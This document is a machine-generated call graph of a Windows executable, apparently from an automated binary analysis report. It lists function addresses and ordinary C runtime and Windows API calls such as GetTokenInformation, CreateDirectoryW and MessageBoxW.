16683->16689 16687 7ff7f3de4558 37 API calls 16684->16687 16684->16692 16685->16689 16686 7ff7f3ddc550 _log10_special 8 API calls 16688 7ff7f3de3dea 16686->16688 16687->16689 16688->16621 16690 7ff7f3de47c0 45 API calls 16689->16690 16689->16692 16693 7ff7f3de3cdc 16689->16693 16690->16693 16691 7ff7f3deea08 46 API calls 16691->16693 16692->16686 16693->16691 16693->16692 16967 7ff7f3de0fc8 16694->16967 16698 7ff7f3de417e 16697->16698 16760 7ff7f3de0b80 16698->16760 16703 7ff7f3de47c0 45 API calls 16706 7ff7f3de42c3 16703->16706 16704 7ff7f3de4351 16704->16652 16704->16704 16705 7ff7f3de47c0 45 API calls 16705->16704 16706->16704 16706->16705 16706->16706 16709 7ff7f3de44c9 16707->16709 16708 7ff7f3de450e 16708->16652 16709->16708 16710 7ff7f3de44e7 16709->16710 16711 7ff7f3de47c0 45 API calls 16709->16711 16712 7ff7f3deea08 46 API calls 16710->16712 16711->16710 16712->16708 16716 7ff7f3de4579 16713->16716 16714 7ff7f3dea814 _invalid_parameter_noinfo 37 API calls 16715 7ff7f3de45aa 16714->16715 16715->16652 16716->16714 16716->16715 16718 7ff7f3de1d87 16717->16718 16719 7ff7f3de1db6 16718->16719 16721 7ff7f3de1e73 16718->16721 16723 7ff7f3de1df3 16719->16723 16899 7ff7f3de0c28 16719->16899 16722 7ff7f3dea814 _invalid_parameter_noinfo 37 API calls 16721->16722 16722->16723 16723->16652 16725 7ff7f3de1977 16724->16725 16726 7ff7f3de19a6 16725->16726 16728 7ff7f3de1a63 16725->16728 16727 7ff7f3de0c28 12 API calls 16726->16727 16730 7ff7f3de19e3 16726->16730 16727->16730 16729 7ff7f3dea814 _invalid_parameter_noinfo 37 API calls 16728->16729 16729->16730 16730->16652 16732 7ff7f3de46ef 16731->16732 16734 7ff7f3de46f3 __crtLCMapStringW 16732->16734 16907 7ff7f3de4748 16732->16907 16734->16652 16736 7ff7f3de2197 16735->16736 16737 7ff7f3de21c6 16736->16737 16739 7ff7f3de2283 16736->16739 16738 7ff7f3de0c28 12 API calls 16737->16738 16741 7ff7f3de2203 16737->16741 16738->16741 16740 7ff7f3dea814 _invalid_parameter_noinfo 37 API calls 16739->16740 16740->16741 16741->16652 16743 7ff7f3de47d7 16742->16743 16911 7ff7f3ded9b8 16743->16911 16749 7ff7f3deea47 16748->16749 16750 7ff7f3deea39 16748->16750 16749->16655 16750->16749 16751 7ff7f3deea67 16750->16751 16752 7ff7f3de47c0 45 API calls 16750->16752 16753 7ff7f3deea9f 16751->16753 16754 7ff7f3deea78 16751->16754 16752->16751 16753->16749 16756 7ff7f3deeb2a 16753->16756 16758 7ff7f3deeac9 16753->16758 16957 7ff7f3df00a0 16754->16957 16757 7ff7f3def8a0 _fread_nolock MultiByteToWideChar 16756->16757 16757->16749 16758->16749 16960 7ff7f3def8a0 16758->16960 16761 7ff7f3de0ba6 16760->16761 16762 7ff7f3de0bb7 16760->16762 16768 7ff7f3dee570 16761->16768 16762->16761 16763 7ff7f3ded5fc _fread_nolock 12 API calls 16762->16763 16764 7ff7f3de0be4 16763->16764 16765 7ff7f3de0bf8 16764->16765 16766 7ff7f3dea948 __free_lconv_num 11 API calls 16764->16766 16767 7ff7f3dea948 __free_lconv_num 11 API calls 16765->16767 16766->16765 16767->16761 16769 7ff7f3dee5c0 16768->16769 16770 7ff7f3dee58d 16768->16770 16769->16770 16773 7ff7f3dee5f2 16769->16773 16771 7ff7f3dea814 _invalid_parameter_noinfo 37 API calls 16770->16771 16781 7ff7f3de42a1 16771->16781 16772 7ff7f3dee705 16774 7ff7f3dee7f7 16772->16774 16776 7ff7f3dee7bd 16772->16776 16778 7ff7f3dee78c 16772->16778 16780 7ff7f3dee74f 16772->16780 16782 7ff7f3dee745 16772->16782 16773->16772 16785 7ff7f3dee63a 16773->16785 16823 7ff7f3deda5c 16774->16823 16816 7ff7f3deddf4 16776->16816 16809 7ff7f3dee0d4 16778->16809 16799 7ff7f3dee304 16780->16799 16781->16703 16781->16706 16782->16776 16784 7ff7f3dee74a 16782->16784 16784->16778 16784->16780 16785->16781 16790 7ff7f3dea4a4 16785->16790 16788 7ff7f3dea900 _isindst 17 API calls 16789 7ff7f3dee854 16788->16789 16791 7ff7f3dea4b1 16790->16791 16792 7ff7f3dea4bb 16790->16792 16791->16792 16797 7ff7f3dea4d6 16791->16797 16793 7ff7f3de4f08 _get_daylight 11 API calls 16792->16793 16794 7ff7f3dea4c2 16793->16794 16832 7ff7f3dea8e0 16794->16832 16796 7ff7f3dea4ce 16796->16781 16796->16788 16797->16796 16798 7ff7f3de4f08 _get_daylight 11 API calls 16797->16798 16798->16794 16835 7ff7f3df40ac 16799->16835 16803 7ff7f3dee3ac 16804 7ff7f3dee401 16803->16804 16805 7ff7f3dee3cc 16803->16805 16808 7ff7f3dee3b0 16803->16808 16888 7ff7f3dedef0 16804->16888 16884 7ff7f3dee1ac 16805->16884 16808->16781 16810 7ff7f3df40ac 38 API calls 16809->16810 16811 7ff7f3dee11e 16810->16811 16812 7ff7f3df3af4 37 API calls 16811->16812 16813 7ff7f3dee16e 16812->16813 16814 7ff7f3dee172 16813->16814 16815 7ff7f3dee1ac 45 API calls 16813->16815 16814->16781 16815->16814 16817 7ff7f3df40ac 38 API calls 16816->16817 16818 7ff7f3dede3f 16817->16818 16819 7ff7f3df3af4 37 API calls 16818->16819 16820 7ff7f3dede97 16819->16820 16821 7ff7f3dede9b 16820->16821 16822 7ff7f3dedef0 45 API calls 16820->16822 16821->16781 16822->16821 16824 7ff7f3dedad4 16823->16824 16825 7ff7f3dedaa1 16823->16825 16827 7ff7f3dedaec 16824->16827 16829 7ff7f3dedb6d 16824->16829 16826 7ff7f3dea814 _invalid_parameter_noinfo 37 API calls 16825->16826 16831 7ff7f3dedacd __scrt_get_show_window_mode 16826->16831 16828 7ff7f3deddf4 46 API calls 16827->16828 16828->16831 16830 7ff7f3de47c0 45 API calls 16829->16830 16829->16831 16830->16831 16831->16781 16833 7ff7f3dea778 _invalid_parameter_noinfo 37 API calls 16832->16833 16834 7ff7f3dea8f9 16833->16834 16834->16796 16836 7ff7f3df40ff fegetenv 16835->16836 16837 7ff7f3df7e2c 37 API calls 16836->16837 16840 7ff7f3df4152 16837->16840 16838 7ff7f3df4242 16841 7ff7f3df7e2c 37 API calls 16838->16841 16839 7ff7f3df417f 16843 7ff7f3dea4a4 __std_exception_copy 37 API calls 16839->16843 16840->16838 16844 7ff7f3df421c 16840->16844 16845 7ff7f3df416d 16840->16845 16842 7ff7f3df426c 16841->16842 16846 7ff7f3df7e2c 37 API calls 16842->16846 16847 7ff7f3df41fd 16843->16847 16848 7ff7f3dea4a4 __std_exception_copy 37 API calls 16844->16848 16845->16838 16845->16839 16849 7ff7f3df427d 16846->16849 16850 7ff7f3df5324 16847->16850 16855 7ff7f3df4205 16847->16855 16848->16847 16852 7ff7f3df8020 20 API calls 16849->16852 16851 7ff7f3dea900 _isindst 17 API calls 16850->16851 16853 7ff7f3df5339 16851->16853 16863 7ff7f3df42e6 __scrt_get_show_window_mode 16852->16863 16854 7ff7f3ddc550 _log10_special 8 API calls 16856 7ff7f3dee351 16854->16856 16855->16854 16880 7ff7f3df3af4 16856->16880 16857 7ff7f3df468f __scrt_get_show_window_mode 16858 7ff7f3df49cf 16860 7ff7f3df3c10 37 API calls 16858->16860 16859 7ff7f3df4327 memcpy_s 16873 7ff7f3df4c6b memcpy_s __scrt_get_show_window_mode 16859->16873 16875 7ff7f3df4783 memcpy_s __scrt_get_show_window_mode 16859->16875 16861 7ff7f3df50e7 16860->16861 16869 7ff7f3df533c memcpy_s 37 API calls 16861->16869 16878 7ff7f3df5142 16861->16878 16862 7ff7f3df497b 16862->16858 16862->16862 16864 7ff7f3df533c memcpy_s 37 API calls 16862->16864 16863->16857 16863->16859 16865 7ff7f3de4f08 _get_daylight 11 API calls 16863->16865 16864->16858 16867 7ff7f3df4760 16865->16867 16866 7ff7f3df52c8 16871 7ff7f3df7e2c 37 API calls 16866->16871 16868 7ff7f3dea8e0 _invalid_parameter_noinfo 37 API calls 16867->16868 16868->16859 16869->16878 16870 7ff7f3de4f08 11 API calls _get_daylight 16870->16873 16871->16855 16872 7ff7f3de4f08 11 API calls _get_daylight 16872->16875 16873->16858 16873->16862 16873->16870 16879 7ff7f3dea8e0 37 API calls _invalid_parameter_noinfo 16873->16879 16874 7ff7f3df3c10 37 API calls 16874->16878 16875->16862 16875->16872 16876 7ff7f3dea8e0 37 API calls _invalid_parameter_noinfo 16875->16876 16876->16875 16877 7ff7f3df533c memcpy_s 37 API calls 16877->16878 16878->16866 16878->16874 16878->16877 16879->16873 16881 7ff7f3df3b13 16880->16881 16882 7ff7f3dea814 _invalid_parameter_noinfo 37 API calls 16881->16882 16883 7ff7f3df3b3e memcpy_s 16881->16883 16882->16883 16883->16803 16885 7ff7f3dee1d8 memcpy_s 16884->16885 16886 7ff7f3de47c0 45 API calls 16885->16886 16887 7ff7f3dee292 memcpy_s __scrt_get_show_window_mode 16885->16887 16886->16887 16887->16808 16889 7ff7f3dedf2b 16888->16889 16893 7ff7f3dedf78 memcpy_s 16888->16893 16890 7ff7f3dea814 _invalid_parameter_noinfo 37 API calls 16889->16890 16891 7ff7f3dedf57 16890->16891 16891->16808 16892 7ff7f3dedfe3 16894 7ff7f3dea4a4 __std_exception_copy 37 API calls 16892->16894 16893->16892 16895 7ff7f3de47c0 45 API calls 16893->16895 16898 7ff7f3dee025 memcpy_s 16894->16898 16895->16892 16896 7ff7f3dea900 _isindst 17 API calls 16897 7ff7f3dee0d0 16896->16897 16898->16896 16900 7ff7f3de0c5f 16899->16900 16906 7ff7f3de0c4e 16899->16906 16901 7ff7f3ded5fc _fread_nolock 12 API calls 16900->16901 16900->16906 16902 7ff7f3de0c90 16901->16902 16903 7ff7f3de0ca4 16902->16903 16904 7ff7f3dea948 __free_lconv_num 11 API calls 16902->16904 16905 7ff7f3dea948 __free_lconv_num 11 API calls 16903->16905 16904->16903 16905->16906 16906->16723 16908 7ff7f3de4766 16907->16908 16909 7ff7f3de476e 16907->16909 16910 7ff7f3de47c0 45 API calls 16908->16910 16909->16734 16910->16909 16912 7ff7f3ded9d1 16911->16912 16913 7ff7f3de47ff 16911->16913 16912->16913 16919 7ff7f3df3304 16912->16919 16915 7ff7f3deda24 16913->16915 16916 7ff7f3de480f 16915->16916 16917 7ff7f3deda3d 16915->16917 16916->16655 16917->16916 16954 7ff7f3df2650 16917->16954 16931 7ff7f3deb150 GetLastError 16919->16931 16922 7ff7f3df335e 16922->16913 16932 7ff7f3deb174 FlsGetValue 16931->16932 16933 7ff7f3deb191 FlsSetValue 16931->16933 16934 7ff7f3deb18b 16932->16934 16950 7ff7f3deb181 16932->16950 16935 7ff7f3deb1a3 16933->16935 16933->16950 16934->16933 16937 7ff7f3deeb98 _get_daylight 11 API calls 16935->16937 16936 7ff7f3deb1fd SetLastError 16938 7ff7f3deb21d 16936->16938 16939 7ff7f3deb20a 16936->16939 16940 7ff7f3deb1b2 16937->16940 16941 7ff7f3dea504 __FrameHandler3::FrameUnwindToEmptyState 38 API calls 16938->16941 16939->16922 16953 7ff7f3df02d8 EnterCriticalSection 16939->16953 16942 7ff7f3deb1d0 FlsSetValue 16940->16942 16943 7ff7f3deb1c0 FlsSetValue 16940->16943 16947 7ff7f3deb222 16941->16947 16945 7ff7f3deb1ee 16942->16945 16946 7ff7f3deb1dc FlsSetValue 16942->16946 16944 7ff7f3deb1c9 16943->16944 16948 7ff7f3dea948 __free_lconv_num 11 API calls 16944->16948 16949 7ff7f3deaef4 _get_daylight 11 API calls 16945->16949 16946->16944 16948->16950 16951 7ff7f3deb1f6 16949->16951 16950->16936 16952 7ff7f3dea948 __free_lconv_num 11 API calls 16951->16952 16952->16936 16955 7ff7f3deb150 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 16954->16955 16956 7ff7f3df2659 16955->16956 16963 7ff7f3df6d88 16957->16963 16962 7ff7f3def8a9 MultiByteToWideChar 16960->16962 16966 7ff7f3df6dec 16963->16966 16964 7ff7f3ddc550 _log10_special 8 API calls 16965 7ff7f3df00bd 16964->16965 16965->16749 16966->16964 16968 7ff7f3de100f 16967->16968 16969 7ff7f3de0ffd 16967->16969 16972 7ff7f3de101d 16968->16972 16976 7ff7f3de1059 16968->16976 16970 7ff7f3de4f08 _get_daylight 11 API calls 16969->16970 16971 7ff7f3de1002 16970->16971 16974 7ff7f3dea8e0 _invalid_parameter_noinfo 37 API calls 16971->16974 16973 7ff7f3dea814 _invalid_parameter_noinfo 37 API calls 16972->16973 16981 7ff7f3de100d 16973->16981 16974->16981 16975 7ff7f3de13d5 16977 7ff7f3de4f08 _get_daylight 11 API calls 16975->16977 16975->16981 16976->16975 16978 7ff7f3de4f08 _get_daylight 11 API calls 16976->16978 16979 7ff7f3de1669 16977->16979 16980 7ff7f3de13ca 16978->16980 16982 7ff7f3dea8e0 _invalid_parameter_noinfo 37 API calls 16979->16982 16983 7ff7f3dea8e0 _invalid_parameter_noinfo 37 API calls 16980->16983 16981->16621 16982->16981 16983->16975 16985 7ff7f3de0704 16984->16985 17012 7ff7f3de0464 16985->17012 16987 7ff7f3de071d 16987->16217 17024 7ff7f3de03bc 16988->17024 16992 7ff7f3ddc850 16991->16992 16993 7ff7f3dd2930 GetCurrentProcessId 16992->16993 16994 7ff7f3dd1c80 49 API calls 16993->16994 16995 7ff7f3dd2979 16994->16995 17038 7ff7f3de4984 16995->17038 17000 7ff7f3dd1c80 49 API calls 17001 7ff7f3dd29ff 17000->17001 17068 7ff7f3dd2620 17001->17068 17004 7ff7f3ddc550 _log10_special 8 API calls 17005 7ff7f3dd2a31 17004->17005 17005->16256 17007 7ff7f3de0119 17006->17007 17009 7ff7f3dd1b89 17006->17009 17008 7ff7f3de4f08 _get_daylight 11 API calls 17007->17008 17010 7ff7f3de011e 17008->17010 17009->16255 17009->16256 17011 7ff7f3dea8e0 _invalid_parameter_noinfo 37 API calls 17010->17011 17011->17009 17013 7ff7f3de04ce 17012->17013 17014 7ff7f3de048e 17012->17014 17013->17014 17016 7ff7f3de04da 17013->17016 17015 7ff7f3dea814 _invalid_parameter_noinfo 37 API calls 17014->17015 17017 7ff7f3de04b5 17015->17017 17023 7ff7f3de546c EnterCriticalSection 17016->17023 17017->16987 17025 7ff7f3dd1a20 17024->17025 17026 7ff7f3de03e6 17024->17026 17025->16225 17025->16226 17026->17025 17027 7ff7f3de03f5 __scrt_get_show_window_mode 17026->17027 17028 7ff7f3de0432 17026->17028 17030 7ff7f3de4f08 _get_daylight 11 API calls 17027->17030 17037 7ff7f3de546c EnterCriticalSection 17028->17037 17032 7ff7f3de040a 17030->17032 17034 7ff7f3dea8e0 _invalid_parameter_noinfo 37 API calls 17032->17034 17034->17025 17042 7ff7f3de49de 17038->17042 17039 7ff7f3de4a03 17040 7ff7f3dea814 _invalid_parameter_noinfo 37 API calls 17039->17040 17044 7ff7f3de4a2d 17040->17044 17041 7ff7f3de4a3f 17077 7ff7f3de2c10 17041->17077 17042->17039 17042->17041 17046 7ff7f3ddc550 _log10_special 8 API calls 17044->17046 17045 7ff7f3dea948 __free_lconv_num 11 API calls 17045->17044 17047 7ff7f3dd29c3 17046->17047 17056 7ff7f3de5160 17047->17056 17049 7ff7f3de4b1c 17049->17045 17050 7ff7f3de4ae8 17050->17049 17052 7ff7f3de4af1 17050->17052 17051 7ff7f3de4b40 17051->17049 17054 7ff7f3de4b4a 17051->17054 17053 7ff7f3dea948 __free_lconv_num 11 API calls 17052->17053 17053->17044 17055 7ff7f3dea948 __free_lconv_num 11 API calls 17054->17055 17055->17044 17057 7ff7f3deb2c8 _get_daylight 11 API calls 17056->17057 17058 7ff7f3de5177 17057->17058 17059 7ff7f3dd29e5 17058->17059 17060 7ff7f3deeb98 _get_daylight 11 API calls 17058->17060 17063 7ff7f3de51b7 17058->17063 17059->17000 17061 7ff7f3de51ac 17060->17061 17062 7ff7f3dea948 __free_lconv_num 11 API calls 17061->17062 17062->17063 17063->17059 17215 7ff7f3deec20 17063->17215 17066 7ff7f3dea900 _isindst 17 API calls 17067 7ff7f3de51fc 17066->17067 17069 7ff7f3dd262f 17068->17069 17070 7ff7f3dd9390 2 API calls 17069->17070 17071 7ff7f3dd2660 17070->17071 17072 7ff7f3dd2683 MessageBoxA 17071->17072 17073 7ff7f3dd266f MessageBoxW 17071->17073 17074 7ff7f3dd2690 17072->17074 17073->17074 17075 7ff7f3ddc550 _log10_special 8 API calls 17074->17075 17076 7ff7f3dd26a0 17075->17076 17076->17004 17078 7ff7f3de2c4e 17077->17078 17079 7ff7f3de2c3e 17077->17079 17080 7ff7f3de2c57 17078->17080 17087 7ff7f3de2c85 17078->17087 17083 7ff7f3dea814 _invalid_parameter_noinfo 37 API calls 17079->17083 17081 7ff7f3dea814 _invalid_parameter_noinfo 37 API calls 17080->17081 17082 7ff7f3de2c7d 17081->17082 17082->17049 17082->17050 17082->17051 17082->17052 17083->17082 17084 7ff7f3de47c0 45 API calls 17084->17087 17086 7ff7f3de2f34 17089 7ff7f3dea814 _invalid_parameter_noinfo 37 API calls 17086->17089 17087->17079 17087->17082 17087->17084 17087->17086 17091 7ff7f3de35a0 17087->17091 17117 7ff7f3de3268 17087->17117 17147 7ff7f3de2af0 17087->17147 17089->17079 17092 7ff7f3de3655 17091->17092 17093 7ff7f3de35e2 17091->17093 17096 7ff7f3de36af 17092->17096 17097 7ff7f3de365a 17092->17097 17094 7ff7f3de367f 17093->17094 17095 7ff7f3de35e8 17093->17095 17164 7ff7f3de1b50 17094->17164 17102 7ff7f3de35ed 17095->17102 17106 7ff7f3de36be 17095->17106 17096->17094 17096->17106 17115 7ff7f3de3618 17096->17115 17098 7ff7f3de368f 17097->17098 17099 7ff7f3de365c 17097->17099 17171 7ff7f3de1740 17098->17171 17101 7ff7f3de35fd 17099->17101 17105 7ff7f3de366b 17099->17105 17116 7ff7f3de36ed 17101->17116 17150 7ff7f3de3f04 17101->17150 17102->17101 17107 7ff7f3de3630 17102->17107 17102->17115 17105->17094 17109 7ff7f3de3670 17105->17109 17106->17116 17178 7ff7f3de1f60 17106->17178 17107->17116 17160 7ff7f3de43c0 17107->17160 17112 7ff7f3de4558 37 API calls 17109->17112 17109->17116 17111 7ff7f3ddc550 _log10_special 8 API calls 17113 7ff7f3de3983 17111->17113 17112->17115 17113->17087 17115->17116 17185 7ff7f3dee858 17115->17185 17116->17111 17118 7ff7f3de3273 17117->17118 17119 7ff7f3de3289 17117->17119 17120 7ff7f3de3655 17118->17120 17121 7ff7f3de35e2 17118->17121 17125 7ff7f3de32c7 17118->17125 17122 7ff7f3dea814 _invalid_parameter_noinfo 37 API calls 17119->17122 17119->17125 17126 7ff7f3de36af 17120->17126 17127 7ff7f3de365a 17120->17127 17123 7ff7f3de367f 17121->17123 17124 7ff7f3de35e8 17121->17124 17122->17125 17130 7ff7f3de1b50 38 API calls 17123->17130 17128 7ff7f3de35ed 17124->17128 17133 7ff7f3de36be 17124->17133 17125->17087 17126->17123 17126->17133 17145 7ff7f3de3618 17126->17145 17129 7ff7f3de368f 17127->17129 17134 7ff7f3de365c 17127->17134 17136 7ff7f3de35fd 17128->17136 17137 7ff7f3de3630 17128->17137 17128->17145 17131 7ff7f3de1740 38 API calls 17129->17131 17130->17145 17131->17145 17132 7ff7f3de3f04 47 API calls 17132->17145 17138 7ff7f3de1f60 38 API calls 17133->17138 17146 7ff7f3de36ed 17133->17146 17135 7ff7f3de366b 17134->17135 17134->17136 17135->17123 17139 7ff7f3de3670 17135->17139 17136->17132 17136->17146 17140 7ff7f3de43c0 47 API calls 17137->17140 17137->17146 17138->17145 17142 7ff7f3de4558 37 API calls 17139->17142 17139->17146 17140->17145 17141 7ff7f3ddc550 _log10_special 8 API calls 17143 7ff7f3de3983 17141->17143 17142->17145 17143->17087 17144 7ff7f3dee858 47 API calls 17144->17145 17145->17144 17145->17146 17146->17141 17198 7ff7f3de0d14 17147->17198 17151 7ff7f3de3f26 17150->17151 17152 7ff7f3de0b80 12 API calls 17151->17152 17153 7ff7f3de3f6e 17152->17153 17154 7ff7f3dee570 46 API calls 17153->17154 17156 7ff7f3de4041 17154->17156 17155 7ff7f3de4063 17157 7ff7f3de40ec 17155->17157 17159 7ff7f3de47c0 45 API calls 17155->17159 17156->17155 17158 7ff7f3de47c0 45 API calls 17156->17158 17157->17115 17158->17155 17159->17157 17161 7ff7f3de4440 17160->17161 17162 7ff7f3de43d8 17160->17162 17161->17115 17162->17161 17163 7ff7f3dee858 47 API calls 17162->17163 17163->17161 17166 7ff7f3de1b83 17164->17166 17165 7ff7f3de1bb2 17167 7ff7f3de0b80 12 API calls 17165->17167 17170 7ff7f3de1bef 17165->17170 17166->17165 17168 7ff7f3de1c6f 17166->17168 17167->17170 17169 7ff7f3dea814 _invalid_parameter_noinfo 37 API calls 17168->17169 17169->17170 17170->17115 17172 7ff7f3de1773 17171->17172 17173 7ff7f3de17a2 17172->17173 17175 7ff7f3de185f 17172->17175 17174 7ff7f3de0b80 12 API calls 17173->17174 17177 7ff7f3de17df 17173->17177 17174->17177 17176 7ff7f3dea814 _invalid_parameter_noinfo 37 API calls 17175->17176 17176->17177 17177->17115 17179 7ff7f3de1f93 17178->17179 17180 7ff7f3de1fc2 17179->17180 17182 7ff7f3de207f 17179->17182 17181 7ff7f3de0b80 12 API calls 17180->17181 17184 7ff7f3de1fff 17180->17184 17181->17184 17183 7ff7f3dea814 _invalid_parameter_noinfo 37 API calls 17182->17183 17183->17184 17184->17115 17186 7ff7f3dee880 17185->17186 17187 7ff7f3dee8c5 17186->17187 17188 7ff7f3de47c0 45 API calls 17186->17188 17191 7ff7f3dee885 __scrt_get_show_window_mode 17186->17191 17194 7ff7f3dee8ae __scrt_get_show_window_mode 17186->17194 17187->17191 17187->17194 17195 7ff7f3df07e8 17187->17195 17188->17187 17189 7ff7f3dea814 _invalid_parameter_noinfo 37 API calls 17189->17191 17191->17115 17194->17189 17194->17191 17197 7ff7f3df080c WideCharToMultiByte 17195->17197 17199 7ff7f3de0d53 17198->17199 17200 7ff7f3de0d41 17198->17200 17203 7ff7f3de0d60 17199->17203 17206 7ff7f3de0d9d 17199->17206 17201 7ff7f3de4f08 _get_daylight 11 API calls 17200->17201 17202 7ff7f3de0d46 17201->17202 17204 7ff7f3dea8e0 _invalid_parameter_noinfo 37 API calls 17202->17204 17205 7ff7f3dea814 _invalid_parameter_noinfo 37 API calls 17203->17205 17212 7ff7f3de0d51 17204->17212 17205->17212 17207 7ff7f3de0e46 17206->17207 17208 7ff7f3de4f08 _get_daylight 11 API calls 17206->17208 17209 7ff7f3de4f08 _get_daylight 11 API calls 17207->17209 17207->17212 17210 7ff7f3de0e3b 17208->17210 17211 7ff7f3de0ef0 17209->17211 17213 7ff7f3dea8e0 _invalid_parameter_noinfo 37 API calls 17210->17213 17214 7ff7f3dea8e0 _invalid_parameter_noinfo 37 API calls 17211->17214 17212->17087 17213->17207 17214->17212 17216 7ff7f3deec3d 17215->17216 17218 7ff7f3de51dd 17216->17218 17220 7ff7f3deec42 17216->17220 17222 7ff7f3deec8c 17216->17222 17217 7ff7f3de4f08 _get_daylight 11 API calls 17219 7ff7f3deec4c 17217->17219 17218->17059 17218->17066 17221 7ff7f3dea8e0 _invalid_parameter_noinfo 37 API calls 17219->17221 17220->17217 17220->17218 17221->17218 17222->17218 17223 7ff7f3de4f08 _get_daylight 11 API calls 17222->17223 17223->17219 17225 7ff7f3dd8633 __std_exception_copy 17224->17225 17226 7ff7f3dd85b1 GetTokenInformation 17224->17226 17229 7ff7f3dd8646 CloseHandle 17225->17229 17230 7ff7f3dd864c 17225->17230 17227 7ff7f3dd85d2 GetLastError 17226->17227 17228 7ff7f3dd85dd 17226->17228 17227->17225 17227->17228 17228->17225 17231 7ff7f3dd85f9 GetTokenInformation 17228->17231 17229->17230 17230->16274 17231->17225 17232 7ff7f3dd861c 17231->17232 17232->17225 17233 7ff7f3dd8626 ConvertSidToStringSidW 17232->17233 17233->17225 17235 7ff7f3ddc850 17234->17235 17236 7ff7f3dd2b74 GetCurrentProcessId 17235->17236 17237 7ff7f3dd26b0 48 API calls 17236->17237 17238 7ff7f3dd2bc7 17237->17238 17239 7ff7f3de4bd8 48 API calls 17238->17239 17240 7ff7f3dd2c10 MessageBoxW 17239->17240 17241 7ff7f3ddc550 _log10_special 8 API calls 17240->17241 17242 7ff7f3dd2c40 17241->17242 17242->16284 17244 7ff7f3dd25e5 17243->17244 17245 7ff7f3de4bd8 48 API calls 17244->17245 17246 7ff7f3dd2604 17245->17246 17246->16300 17292 7ff7f3de8794 17247->17292 17251 7ff7f3dd81dc 17250->17251 17252 7ff7f3dd9390 2 API calls 17251->17252 17253 7ff7f3dd81fb 17252->17253 17254 7ff7f3dd8203 17253->17254 17255 7ff7f3dd8216 ExpandEnvironmentStringsW 17253->17255 17256 7ff7f3dd2810 49 API calls 17254->17256 17257 7ff7f3dd823c __std_exception_copy 17255->17257 17258 7ff7f3dd820f __std_exception_copy 17256->17258 17259 7ff7f3dd8253 17257->17259 17260 7ff7f3dd8240 17257->17260 17262 7ff7f3ddc550 _log10_special 8 API calls 17258->17262 17264 7ff7f3dd82bf 17259->17264 17265 7ff7f3dd8261 GetDriveTypeW 17259->17265 17261 7ff7f3dd2810 49 API calls 17260->17261 17261->17258 17333 7ff7f3df1558 17292->17333 17392 7ff7f3df12d0 17333->17392 17413 7ff7f3df02d8 EnterCriticalSection 17392->17413 17540 7ff7f3dd456a 17539->17540 17541 7ff7f3dd9390 2 API calls 17540->17541 17542 7ff7f3dd458f 17541->17542 17543 7ff7f3ddc550 _log10_special 8 API calls 17542->17543 17544 7ff7f3dd45b7 17543->17544 17544->16330 17546 7ff7f3dd7e2e 17545->17546 17547 7ff7f3dd7f52 17546->17547 17548 7ff7f3dd1c80 49 API calls 17546->17548 17549 7ff7f3ddc550 _log10_special 8 API calls 17547->17549 17554 7ff7f3dd7eb5 17548->17554 17550 7ff7f3dd7f83 17549->17550 17550->16330 17551 7ff7f3dd1c80 49 API calls 17551->17554 17552 7ff7f3dd4560 10 API calls 17552->17554 17553 7ff7f3dd7f0b 17555 7ff7f3dd9390 2 API calls 17553->17555 17554->17547 17554->17551 17554->17552 17554->17553 17556 7ff7f3dd7f23 CreateDirectoryW 17555->17556 17556->17547 17556->17554 17558 7ff7f3dd1613 17557->17558 17559 7ff7f3dd1637 17557->17559 17678 7ff7f3dd1050 17558->17678 17561 7ff7f3dd45c0 108 API calls 17559->17561 17563 7ff7f3dd164b 17561->17563 17562 7ff7f3dd1618 17564 7ff7f3dd162e 17562->17564 17569 7ff7f3dd2710 54 API calls 17562->17569 17565 7ff7f3dd1653 17563->17565 17566 7ff7f3dd1682 17563->17566 17564->16330 17567 7ff7f3de4f08 _get_daylight 11 API calls 17565->17567 17568 7ff7f3dd45c0 108 API calls 17566->17568 17570 7ff7f3dd1658 17567->17570 17571 7ff7f3dd1696 17568->17571 17569->17564 17572 7ff7f3dd2910 54 API calls 17570->17572 17573 7ff7f3dd169e 17571->17573 17574 7ff7f3dd16b8 17571->17574 17575 7ff7f3dd1671 17572->17575 17576 7ff7f3dd2710 54 API calls 17573->17576 17577 7ff7f3de06d4 73 API calls 17574->17577 17575->16330 17578 7ff7f3dd16ae 17576->17578 17579 7ff7f3dd16cd 17577->17579 17584 7ff7f3de004c 74 API calls 17578->17584 17580 7ff7f3dd16d1 17579->17580 17581 7ff7f3dd16f9 17579->17581 17606 7ff7f3dd718b 17605->17606 17608 7ff7f3dd7144 17605->17608 17606->16330 17608->17606 17742 7ff7f3de5024 17608->17742 17610 7ff7f3dd41a1 17609->17610 17611 7ff7f3dd44e0 49 API calls 17610->17611 17612 7ff7f3dd41db 17611->17612 17613 7ff7f3dd44e0 49 API calls 17612->17613 17614 7ff7f3dd41eb 17613->17614 17615 7ff7f3dd423c 17614->17615 17616 7ff7f3dd420d 17614->17616 17618 7ff7f3dd4110 51 API calls 17615->17618 17773 7ff7f3dd4110 17616->17773 17619 7ff7f3dd423a 17618->17619 17620 7ff7f3dd429c 17619->17620 17621 7ff7f3dd4267 17619->17621 17623 7ff7f3dd4110 51 API calls 17620->17623 17780 7ff7f3dd7cf0 17621->17780 17625 7ff7f3dd42c0 17623->17625 17654 7ff7f3dd1c80 49 API calls 17653->17654 17655 7ff7f3dd4474 17654->17655 17655->16330 17679 7ff7f3dd45c0 108 API calls 17678->17679 17680 7ff7f3dd108c 17679->17680 17681 7ff7f3dd1094 17680->17681 17682 7ff7f3dd10a9 17680->17682 17683 7ff7f3dd2710 54 API calls 17681->17683 17684 7ff7f3de06d4 73 API calls 17682->17684 17690 7ff7f3dd10a4 __std_exception_copy 17683->17690 17685 7ff7f3dd10bf 17684->17685 17686 7ff7f3dd10c3 17685->17686 17687 7ff7f3dd10e6 17685->17687 17688 7ff7f3de4f08 _get_daylight 11 API calls 17686->17688 17692 7ff7f3dd1122 17687->17692 17693 7ff7f3dd10f7 17687->17693 17689 7ff7f3dd10c8 17688->17689 17691 7ff7f3dd2910 54 API calls 17689->17691 17690->17562 17695 7ff7f3dd1129 17692->17695 17703 7ff7f3dd113c 17692->17703 17694 7ff7f3de4f08 _get_daylight 11 API calls 17693->17694 17697 7ff7f3dd1100 17694->17697 17696 7ff7f3dd1210 92 API calls 17695->17696 17743 7ff7f3de5031 17742->17743 17744 7ff7f3de505e 17742->17744 17745 7ff7f3de4f08 _get_daylight 11 API calls 17743->17745 17753 7ff7f3de4fe8 17743->17753 17746 7ff7f3de5081 17744->17746 17747 7ff7f3de509d 17744->17747 17748 7ff7f3de503b 17745->17748 17749 7ff7f3de4f08 